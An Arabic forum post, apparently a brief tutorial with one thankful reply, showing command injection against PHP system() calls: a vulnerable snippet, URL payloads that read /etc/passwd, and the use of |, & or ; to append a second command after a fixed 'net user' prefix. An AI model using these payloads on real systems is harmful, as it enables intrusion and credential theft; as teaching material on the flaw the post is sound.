تخطي الاوامر الثابتة في دوال سيستم ويندوز و لينكس

السلام عليكم ورحمة الله وبركـاته

كيف حال الجميع ؟

الجميع يعرف دالة سيستم وثغرات

Remote Command Execution

كود بسيط متل هيك

كود PHP:
system($_GET['red']);
?>

استغلاله هيبقى

كود:file.php?red=cat /etc/passwd

لحد هنا الامور تمام وده شيء بسيط بيتهيالي الكل بيدركه

لكن الجديد في الموضوع لو كان الكود كده

طبعا ده يعمل في ويندوز .. وبمجرد التصفح يديك النتيجة

تمام .. لو تم التصفح وادخال قيمة يوزر متل b0x بالشكل التاني

كود:file.php?red=b0x

هنلاقي انه اعطانا معلومات بمعنى اصبح الامر الجاهز للتنفيذ في php بالشكل التالي

كود:net user b0x

وهذا يكون لك امر جاهز لكن احنا كيف رح نقوم بتغير الامر بمعنى الغاء الامر net user ووضع الامر الخاص فينا

الكركتر البسيط

كود:|

او

كود:&

او

كود: ;

في لينكس وويندوز ..

صورة بعد التطبيق لامر

ver - يظهر اصدار كيرنل الويندوز

وامر

dir - يظهر الملفات و الفولدرز زي امر ls

في لينكس كده تصير

كود:Red.php?red=b0x;cat /etc/passwd

بكده انتهينا
درس خفيف

شكراًً لك اخي على الموضوع الرائع الله لايهينك

» ويندوز Xp - جزء اول

صفحة 1 من اصل 1